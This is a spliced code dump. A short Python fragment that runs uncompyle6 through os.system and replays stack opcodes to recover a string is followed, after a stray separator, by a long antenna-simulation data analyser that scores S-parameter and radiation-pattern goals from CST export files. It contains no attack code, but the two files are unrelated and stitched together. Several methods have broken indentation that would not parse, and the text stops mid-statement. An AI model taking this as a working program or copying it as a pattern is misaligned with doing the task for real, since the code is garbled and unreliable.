# Shell out to uncompyle6 to produce a readable disassembly/source dump.
# Command is built from constants above, so no injection risk here.
system(f"{uncompyleExe} {outputPycFile} > {outputSrcFile}")
def ROT_TWO(_list):
    """Emulate the ROT_TWO opcode: swap the top two stack items in place.

    Lists shorter than two elements are returned unchanged.
    """
    if len(_list) >= 2:
        _list[-1], _list[-2] = _list[-2], _list[-1]
    return _list
def BINARY_ADD(_list):
    """Emulate the BINARY_ADD opcode: replace the top two stack items
    with second-from-top + top (so string operands concatenate in
    stack order).

    Lists shorter than two elements are returned unchanged.
    """
    if len(_list) >= 2:
        top = _list.pop()
        _list[-1] = _list[-1] + top
    return _list
# Replay the decompiled bytecode listing on a software stack: each
# LOAD_CONST pushes its integer argument as a character, ROT_TWO and
# BINARY_ADD manipulate the stack like the real VM would, and the final
# stack contents spell out the recovered string.
stack = []
for line in open(outputSrcFile):
    if "LOAD_CONST" in line:
        try:
            # Third whitespace-separated token is the const argument;
            # non-integer consts (names, None, ...) are skipped.
            stack.append(chr(int(line.split()[2])))
        except ValueError:
            pass
    elif "ROT_TWO" in line:
        stack = ROT_TWO(stack)
    elif "BINARY_ADD" in line:
        stack = BINARY_ADD(stack)
print(stack)
|
python
|
import numpy as np
from scipy.signal import find_peaks
import os
import pycst_ctrl
class PyCstDataAnalyser:
""" Used to analyse data exported by CST"""
    def __init__(self, opts):
        """Initializes the analyser from an options dict.

        Args:
            opts: Dict of analyser options; every key is optional and
                falls back to the default shown in each get() call below.
                Goals are target values (dB unless noted), weights of 0
                disable the corresponding objective term.
        """
        # Initialize attributes
        # Polarization indicator
        self.pol_ind = opts.get('pol_ind', 'lin_dir')
        # Samples in CST farfield data
        self.np_theta = opts.get('np_theta', 360)
        self.np_phi = opts.get('np_phi', 5)
        # Normalization factor for all objective value,
        # all object values will be normalized by (goal_val*norm_factor), which represents the relative tolerance
        # for each goal. This factor aims to bring multiple types of objective values into same range in
        # one cost function.
        self.norm_factor = opts.get('norm_factor', 0.1)
        # Taper definition in dB
        self.taper = opts.get('taper', -12)
        # Weight for rotational symmetry evaluation
        self.rotsym_goal_val = opts.get('rotsym_goal_val', 0)
        self.rotsym_weight = opts.get('rotsym_weight', 0)
        # Goal and Weight for cx-pol level evaluation
        self.cxlevel_goal_val = opts.get('cxlevel_goal_val', -35)
        self.cxlevel_weight = opts.get('cxlevel_weight', 0)
        # Goal and Weight for taper angle evaluation
        self.taperang_goal_range = opts.get('taperang_goal_range', np.array([10, 24]))
        self.taperang_weight = opts.get('taperang_weight', 0)
        # Goal and Weight for SLL evaluation
        self.sll_goal_val = opts.get('sll_goal_val', -30)
        self.sll_weight = opts.get('sll_weight', 0)
        # Goal and weight for Farfield AR evaluation
        self.ar_ff_goal = opts.get('ar_ff_goal', 0)
        # self.ar_ff_max_goal = opts.get('ar_ff_max_goal', 3)
        self.ar_ff_mae_weight = opts.get('ar_ff_mae_weight', 0)
        self.ar_ff_max_weight = opts.get('ar_ff_max_weight', 0)
        # Frequency range within which the S parameters are requested to be evaluated
        self.spara_eva_freq_range_vec = opts.get('spara_eva_freq_range_vec', np.array([85, 110]))
        # Goal and Weight for S11 evaluation in db value
        self.spara_file_name_lst = opts.get('spara_file_name_lst', ['S-Parameters_S1(1),1(1).txt'])
        self.spara_goal_lst = opts.get('spara_goal_lst', [-40])
        self.spara_mae_weight_lst = opts.get('spara_mae_weight_lst', [0])
        self.spara_maxnorm_weight_lst = opts.get('spara_maxnorm_weight_lst', [0])
        # Goal and Weight for S11 evaluation in linear value
        self.spara_lin_goal_lst = opts.get('spara_lin_goal_lst', [0.01])
        self.spara_lin_mae_weight_lst = opts.get('spara_lin_mae_weight_lst', [0])
        self.spara_lin_max_weight_lst = opts.get('spara_lin_max_weight_lst', [0])
        # dB / linear S-parameter evaluation is enabled only when the goal
        # list length matches the file list length (one goal per file).
        if len(self.spara_goal_lst) == len(self.spara_file_name_lst):
            self.spara_eval_db = True
        else:
            self.spara_eval_db = False
        if len(self.spara_lin_goal_lst) == len(self.spara_file_name_lst):
            self.spara_eval_lin = True
        else:
            self.spara_eval_lin = False
        # Frequency range within which the NR AR are requested to be evaluated
        self.nf_ar_eva_freq_range_vec = opts.get('nf_ar_eva_freq_range_vec', np.array([85, 110]))
        # Goal and Weight for nearfield AR evaluation
        self.nf_ar_file_name = opts.get('nf_ar_file_name', 'AR_AllFreq.txt')
        self.nf_ar_goal = opts.get('nf_ar_goal', 0)
        self.nf_ar_mae_weight = opts.get('nf_ar_mae_weight', 0)
        self.nf_ar_maxnorm_weight = opts.get('nf_ar_maxnorm_weight', 0)
@staticmethod
def func_taper_angle_get(theta_vec, dir_co_norm_arr, taper):
index_barr = dir_co_norm_arr >= taper
theta_arr = np.vstack((theta_vec, theta_vec, theta_vec))
theta_arr_tapered = theta_arr[index_barr]
taper_ang = np.amax(np.absolute(theta_arr_tapered))
return taper_ang
    @staticmethod
    def func_exp_ff_data_proc(export_folder, filename, np_theta, np_phi, pol_ind='RHCP'):
        """Load one CST farfield export file and split it into per-cut arrays.

        The file is assumed to hold np_phi cuts of np_theta samples each,
        with columns theta / <unused> / abs / LHCP / <unused> / RHCP-or-co
        / <unused> / AR. Only cuts 2..4 (three cuts) are kept; each cut is
        closed by repeating its first sample at theta+360.
        Returns (theta_vec, co/cx/abs raw arrays, co/cx/abs normalized
        arrays, co/cx/abs peak column vectors, AR array, boresight AR).
        """
        # Get export farfield data file
        full_exp_ff_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 2
        cut_data = np.genfromtxt(full_exp_ff_file, skip_header=headerlin)
        # Get Theta (Col.1)
        theta_arr = cut_data[:, 0].reshape(np_phi, np_theta)
        # Close the cut: append the first theta sample shifted by 360 deg.
        theta_arr = np.c_[theta_arr, 360 + theta_arr[:, 0]]
        theta_vec = theta_arr[0, :]
        # Decide data column index for co-pol and cx-pol
        if pol_ind == 'LHCP':
            co_col_index = 3
            cx_col_index = 5
        else:  # pol_ind = 'RHCP' or 'lin_dir'
            co_col_index = 5
            cx_col_index = 3
        # Get directivity for Co-Pol (Col.4 is LHCP, Col.6 is RHCP or Co-pol if linear direction is chose) for each cut
        dir_co_all = cut_data[:, co_col_index].reshape(np_phi, np_theta)
        dir_co_arr = dir_co_all[2:5, :]
        dir_co_arr = np.c_[dir_co_arr, dir_co_arr[:, 0]]
        # Boresight is assumed to be the middle theta sample (np_theta//2).
        peak_co_cvec = dir_co_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        dir_co_norm_arr = dir_co_arr - peak_co_cvec
        # Get directivity for Cx-Pol (Col.4 is LHCP, Col.6 is RHCP or Cx-pol if linear direction is chose) for each cut
        dir_cx_all = cut_data[:, cx_col_index].reshape(np_phi, np_theta)
        dir_cx_arr = dir_cx_all[2:5, :]
        dir_cx_arr = np.c_[dir_cx_arr, dir_cx_arr[:, 0]]
        peak_cx_cvec = dir_cx_arr.max(axis=1).reshape(-1, 1)
        # NOTE(review): cx is normalized by the CO-pol peak (peak_co_cvec),
        # not peak_cx_cvec — appears intentional (cx level relative to
        # co-pol boresight), but confirm.
        dir_cx_norm_arr = dir_cx_arr - peak_co_cvec
        # Get directivity for Abs (Col.3) for each cut
        dir_abs_all = cut_data[:, 2].reshape(np_phi, np_theta)
        dir_abs_arr = dir_abs_all[2:5, :]
        dir_abs_arr = np.c_[dir_abs_arr, dir_abs_arr[:, 0]]
        peak_abs_cvec = dir_abs_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        dir_abs_norm_arr = dir_abs_arr - peak_abs_cvec
        # Get AR (Col.8) for each cut
        ar_all = cut_data[:, 7].reshape(np_phi, np_theta)
        ar_arr = ar_all[2:5, :]
        ar_arr = np.c_[ar_arr, ar_arr[:, 0]]
        ar_boresight_cvec = ar_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        return theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
            dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
            peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
            ar_arr, ar_boresight_cvec
    def func_rotsym_objval_calc_mse(self, theta_vec, dir_co_norm_arr, taper, goal_val, weight):
        """
        This function calculates the weighted MSE between radiation pattern of each cut and average radiation pattern,
        the result is a scalar value which represents the rotational symmetry at this frequency.
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get the taper angle
        taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
        angle_range = np.array([-taper_ang, taper_ang])
        # Get theta vector within the taper angle
        index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
        theta_tapered_vec = theta_vec[index_bvec]
        # Calculate weight for directivity at different theta
        # (exponentially de-emphasizes samples far from boresight:
        # 10^(-|theta|/taper_ang), i.e. 1 at boresight, 0.1 at the edge).
        radpat_weight_vec = 10 ** ((-1) * (np.absolute(theta_tapered_vec) / taper_ang))
        # Calculate MSE between radiation pattern of each cut and average radiation pattern
        index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
        dir_co_norm_tapered_arr = dir_co_norm_arr[index_barr].reshape(-1, len(theta_tapered_vec))
        dir_co_norm_avg_tapered_vec = np.mean(dir_co_norm_tapered_arr, axis=0)
        # Calculate difference based on array broadcasting
        dir_co_sqrdiff_tapered_arr = (dir_co_norm_tapered_arr - dir_co_norm_avg_tapered_vec) ** 2
        mse_vec = np.mean(dir_co_sqrdiff_tapered_arr * radpat_weight_vec, axis=1)
        # Calculate objective value (truncated at the goal, then weighted).
        objective_val = max(mse_vec.sum() - goal_val, 0)
        objective_val *= weight
        return objective_val
@staticmethod
def func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, goal_val, weight, norm_factor):
"""
This function calculates the cx-level which is the maximum level of normalized cx-pol among all cuts at one
frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the maximum level of normalized cx-pol among all cuts
cxlevel = np.amax(dir_cx_norm_arr)
# Calculate truncated objective value
objective_val = max((cxlevel - goal_val), 0) / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
    def func_taperang_objval_calc_rangetrunc(self, theta_vec, dir_co_norm_arr, taper, goal_range, weight, norm_factor):
        """
        This function calculates the truncated difference between simulated taper angle and expected taper angle range
        at one frequency.
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get the max taper angle of the radiation pattern
        taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
        range_cent = goal_range.mean()
        if (taper_ang >= goal_range[0]) and (taper_ang <= goal_range[1]):
            objective_val = 0  # Objective is 0 if simulated taper angle is in the expected range
        else:
            # Distance from the range center, normalized by the center
            # value times the relative tolerance.
            objective_val = abs(taper_ang - range_cent) / (range_cent * norm_factor)
        objective_val *= weight
        return objective_val
@staticmethod
def func_sll_max_get(dir_co_norm_arr):
"""
This function gets the max SLL of all cuts
"""
cut_num = dir_co_norm_arr.shape[0]
# Initialize an array to store SLL value of each cut
sll_val_vec = np.zeros(cut_num)
for i in range(cut_num):
# Get peaks of each cut
dir_co_norm_cut_vec = dir_co_norm_arr[i, :]
peak_index, properties = find_peaks(dir_co_norm_cut_vec)
peaks = dir_co_norm_cut_vec[peak_index]
# Sort peaks in ascending order
pks_sort = np.sort(peaks)
if 0 == len(pks_sort): # Probably there is no radiation at all due to large reflection coefficient
sll_val_vec[i] = 65535
elif 1 == len(pks_sort):
sll_val_vec[i] = -128 # Set SLL value to a value that will always be lower than the goal
else:
sll_val_vec[i] = pks_sort[-2] # Not always the 1st sidelobe but the highest one
sll_val_max = np.amax(sll_val_vec)
return sll_val_max
    def func_sll_objval_calc_trunc(self, dir_co_norm_arr, goal_val, weight, norm_factor):
        """
        This function calculates truncated difference between max SLL of all cuts and expected SLL at this frequency
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get max SLL of all cuts
        sll_val_max = self.func_sll_max_get(dir_co_norm_arr)
        # Excess over the goal (0 when at/below goal), normalized by
        # |goal| * relative tolerance, then weighted.
        objective_val = max((sll_val_max - goal_val), 0) / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val
@staticmethod
def func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates the truncated MAE of AR over given beamwidth (angle range) at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR over the given beamwidth among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Calculate the truncated difference simulated AR and expected AR over the given beamwidth
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
# objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
objective_val = diff_trunc_vec.mean() / (abs(goal_val))
objective_val *= weight
return objective_val
@staticmethod
def func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates truncated difference between max AR over given beamwidth for all cuts at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Limit the evaluate frequency range
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
# objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
objective_val = max_diff_trunc / (abs(goal_val))
# objective_val = max_diff_trunc
objective_val *= weight
return objective_val
    @staticmethod
    def func_cst_spara_data_proc(exp_data_folder, singlerun_data_folder_name, spara_filename):
        """Load a CST-exported S-parameter file.

        Expects two whitespace-separated columns: frequency and linear
        magnitude. Returns (freq_vec, linear magnitude, magnitude in dB).
        """
        # Get export S Para data file
        full_spara_file = os.path.join(exp_data_folder, singlerun_data_folder_name, spara_filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # Voltage-ratio convention: dB = 20*log10(|S|).
        s_mag_db = 20 * np.log10(s_mag_lin)
        return freq_vec, s_mag_lin, s_mag_db
    @staticmethod
    def func_meas_spara_data_proc(meas_data_folder, meas_spara_filename):
        """
        Process s-parameter data measured by Keysight PNA-X with OML mmWave head

        Expects a 7-line header and comma-separated columns: frequency in
        Hz, magnitude in dB, phase in degrees. Returns
        (freq_vec in GHz, s_mag_db, s_ph_deg).
        """
        # Get export S Para data file
        meas_spara_filepath = os.path.join(meas_data_folder, meas_spara_filename)
        # Load data
        headerlin = 7
        delimiter_str = ","
        spara_data = np.genfromtxt(meas_spara_filepath, skip_header=headerlin, delimiter=delimiter_str)
        # Parses data
        freq_vec = spara_data[:, 0] / 1e9  # Convert to GHz
        s_mag_db = spara_data[:, 1]
        s_ph_deg = spara_data[:, 2]
        return freq_vec, s_mag_db, s_ph_deg
    @staticmethod
    def func_spara_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
        """Truncated-MAE objective for an S-parameter magnitude in dB.

        Loads the exported file (col 0: frequency, col 1: linear
        magnitude), converts to dB, keeps samples inside freq_range_vec,
        and averages the excess of each sample over goal_val (0 when at or
        below the goal). The mean is normalized by |goal_val|*norm_factor
        and scaled by weight.
        """
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_spara_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
        """Truncated-max objective for an S-parameter magnitude in dB.

        Same loading/truncation as the MAE variant, but the objective is
        the single worst excess over goal_val in the frequency range,
        normalized by |goal_val|*norm_factor and scaled by weight.
        """
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_spara_lin_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Truncated-MAE objective for an S-parameter in LINEAR magnitude.

        Keeps samples inside freq_range_vec and averages the excess of the
        linear magnitude over goal_val (0 when at or below the goal),
        scaled by weight. No normalization by the goal here.
        """
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean()
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_spara_lin_objval_calc_maxtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Truncated-max objective for an S-parameter in LINEAR magnitude.

        Same as the linear MAE variant, but the objective is the single
        worst excess over goal_val in the frequency range, scaled by
        weight. No normalization by the goal here.
        """
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        objective_val = max_diff_trunc
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_nf_ar_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Truncated-MAE objective for nearfield axial ratio vs frequency.

        The file holds frequency in col 0 and AR in col 1; samples inside
        freq_range_vec are compared to goal_val and the mean excess
        (0 when at/below goal) is scaled by weight.
        """
        # Get export AR data file
        full_nr_ar_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
        # Parses data
        freq_vec = nf_ar_data[:, 0]
        nf_ar_real = nf_ar_data[:, 1]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean()
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_nf_ar_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Truncated-max objective for nearfield axial ratio vs frequency.

        Objective is the single worst excess of AR over goal_val in the
        frequency range, normalized by |goal_val|/2 and scaled by weight.
        NOTE(review): with the class default nf_ar_goal = 0 this divides
        by zero — confirm callers always pass a non-zero goal.
        """
        # Get export AR data file
        full_nr_ar_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
        # Parses data
        freq_vec = nf_ar_data[:, 0]
        nf_ar_real = nf_ar_data[:, 1]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        objective_val = max_diff_trunc / (abs(goal_val) / 2)
        objective_val *= weight
        return objective_val
    @staticmethod
    def func_spara_data_sample_extract(export_folder, filename, freq_limit_vec, sample_num):
        """Pick sample_num evenly spaced samples of an S-parameter trace.

        Loads the file (col 0: frequency, col 1: linear magnitude),
        restricts to freq_limit_vec, then selects sample_num indices
        evenly spaced from the first to the last kept point (both
        included). Returns (freq_sample_vec, s_mag_lin_sample_vec).
        """
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_limit_vec[0], freq_vec <= freq_limit_vec[1])
        freq_range_vec = freq_vec[index_bvec]
        s_mag_range_lin_vec = s_mag_lin[index_bvec]
        # Get the samples from the data within the range
        data_num = len(s_mag_range_lin_vec)  # data points including the first and last points
        # Generate sample index between the first index (0) and the last index (data_num -1) (include last index)
        sample_index = np.linspace(0, data_num - 1, sample_num).astype(int)  # Cast the sample index to integer
        freq_sample_vec = freq_range_vec[sample_index]
        s_mag_lin_sample_vec = s_mag_range_lin_vec[sample_index]
        return freq_sample_vec, s_mag_lin_sample_vec
    def func_cst_data_spara_analyse(self, singlerun_export_folder):
        """Evaluate all configured S-parameter objectives for one run.

        For every file in spara_file_name_lst, computes the enabled dB
        (MAE and/or max-norm) and linear (MAE and/or max) objective terms
        — a weight of 0 skips the corresponding term — and returns them
        appended into one 1-D numpy vector.
        """
        # Evaluate S parameters
        spara_objval_vec = np.array([])
        spara_eva_freq_range_vec = self.spara_eva_freq_range_vec
        for i in range(len(self.spara_file_name_lst)):
            spara_file_name = self.spara_file_name_lst[i]
            if self.spara_eval_db is True:  # if configuration is valid
                # Goal and weight for spara in db values
                spara_goal_val = self.spara_goal_lst[i]
                spara_mae_weight = self.spara_mae_weight_lst[i]
                spara_maxnorm_weight = self.spara_maxnorm_weight_lst[i]
                if spara_mae_weight != 0:
                    spara_objval_mae = self.func_spara_objval_calc_maetrunc(singlerun_export_folder, spara_file_name,
                                                                            spara_goal_val, spara_eva_freq_range_vec,
                                                                            spara_mae_weight, self.norm_factor)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_objval_mae)
                if spara_maxnorm_weight != 0:
                    spara_objval_max = self.func_spara_objval_calc_maxnormtrunc(singlerun_export_folder,
                                                                                spara_file_name, spara_goal_val,
                                                                                spara_eva_freq_range_vec,
                                                                                spara_maxnorm_weight, self.norm_factor)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_objval_max)
            if self.spara_eval_lin is True:
                # Goal and weight for spara in linear values
                spara_lin_goal_val = self.spara_lin_goal_lst[i]
                spara_lin_mae_weight = self.spara_lin_mae_weight_lst[i]
                spara_lin_max_weight = self.spara_lin_max_weight_lst[i]
                if spara_lin_mae_weight != 0:
                    spara_lin_objval_mae = self.func_spara_lin_objval_calc_maetrunc(singlerun_export_folder,
                                                                                    spara_file_name, spara_lin_goal_val,
                                                                                    spara_eva_freq_range_vec,
                                                                                    spara_lin_mae_weight)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_mae)
                if spara_lin_max_weight != 0:
                    spara_lin_objval_max = self.func_spara_lin_objval_calc_maxtrunc(singlerun_export_folder,
                                                                                    spara_file_name, spara_lin_goal_val,
                                                                                    spara_eva_freq_range_vec,
                                                                                    spara_lin_max_weight)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_max)
        return spara_objval_vec
    def func_cst_data_farfield_analyse(self, singlerun_export_folder, ff_export_sub_folder):
        """Evaluate exported farfield data and return radiation-pattern objective values.

        For every farfield export file (apparently one per frequency sample) the
        metrics with a non-zero weight are computed: rotational symmetry,
        cross-pol level, taper angle, side-lobe level, and farfield axial
        ratio (MAE and max forms).  Each metric's per-frequency values are
        then averaged into one entry of the returned vector.

        :param singlerun_export_folder: folder with this run's exported data
        :param ff_export_sub_folder: sub-folder holding farfield exports; an
            empty string disables farfield evaluation (the file loop runs
            zero times)
        :return: 1-D numpy array with one mean objective value per enabled metric
        """
        # Get farfield data file list if it exists
        ff_export_folder = os.path.join(singlerun_export_folder, ff_export_sub_folder)
        if ff_export_sub_folder != "":
            # Get all the farfield export data file
            farfield_data_file_list = pycst_ctrl.func_file_list_get(ff_export_folder, ext='.txt')
        else:
            # NOTE(review): "" is used as an empty-iterable sentinel so the
            # per-file loop below simply does not execute — presumably
            # intentional when no farfield export is configured.
            farfield_data_file_list = ""
        # Initialize result vectors over all frequency samples
        rotsym_objval_vec = np.array([])
        cxlevel_objval_vec = np.array([])
        taperang_objval_vec = np.array([])
        sll_objval_vec = np.array([])
        ar_ff_mae_objval_vec = np.array([])
        ar_ff_max_objval_vec = np.array([])
        for export_file in farfield_data_file_list:
            # Parse one frequency sample's farfield export into pattern arrays
            theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
                dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
                peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
                ar_arr, ar_boresight_cvec = \
                self.func_exp_ff_data_proc(ff_export_folder, export_file, self.np_theta, self.np_phi, self.pol_ind)
            # Calculate rotational symmetry fitness
            if self.rotsym_weight != 0:
                rotsym_objval_freq = self.func_rotsym_objval_calc_mse(theta_vec, dir_co_norm_arr, self.taper,
                                                                      self.rotsym_goal_val, self.rotsym_weight)
                rotsym_objval_vec = np.append(rotsym_objval_vec, rotsym_objval_freq)
            # Calculate Cx-Pol level fitness
            if self.cxlevel_weight != 0:
                cxlevel_objval_freq = self.func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, self.cxlevel_goal_val,
                                                                          self.cxlevel_weight, self.norm_factor)
                cxlevel_objval_vec = np.append(cxlevel_objval_vec, cxlevel_objval_freq)
            # Calculate taper angle fitness
            if self.taperang_weight != 0:
                taperang_objval_freq = self.func_taperang_objval_calc_rangetrunc(theta_vec, dir_co_norm_arr,
                                                                                 self.taper,
                                                                                 self.taperang_goal_range,
                                                                                 self.taperang_weight, self.norm_factor)
                taperang_objval_vec = np.append(taperang_objval_vec, taperang_objval_freq)
            # Calculate SLL fitness
            if self.sll_weight != 0:
                sll_objval_freq = self.func_sll_objval_calc_trunc(dir_co_norm_arr, self.sll_goal_val,
                                                                  self.sll_weight, self.norm_factor)
                sll_objval_vec = np.append(sll_objval_vec, sll_objval_freq)
            # Calculate Farfield AR fitness
            # Decide theta range for evaluation: AR is judged only inside the
            # taper angle of the co-pol pattern, symmetric around boresight
            taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, self.taper)
            angle_range = np.array([-taper_ang, taper_ang])
            # Calculate fitness over the theta range
            if self.ar_ff_mae_weight != 0:
                af_ff_mae_objval_freq = self.func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range,
                                                                             self.ar_ff_goal, self.ar_ff_mae_weight,
                                                                             self.norm_factor)
                ar_ff_mae_objval_vec = np.append(ar_ff_mae_objval_vec, af_ff_mae_objval_freq)
            if self.ar_ff_max_weight != 0:
                af_ff_max_objval_freq = self.func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range,
                                                                             self.ar_ff_goal, self.ar_ff_max_weight,
                                                                             self.norm_factor)
                ar_ff_max_objval_vec = np.append(ar_ff_max_objval_vec, af_ff_max_objval_freq)
        # Form radiation pattern objective value list: each enabled metric
        # contributes the mean of its per-frequency values, in a fixed order
        radpat_objval_vec = np.array([])
        if self.rotsym_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, rotsym_objval_vec.mean())
        if self.cxlevel_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, cxlevel_objval_vec.mean())
        if self.taperang_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, taperang_objval_vec.mean())
        if self.sll_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, sll_objval_vec.mean())
        if self.ar_ff_mae_weight != 0:
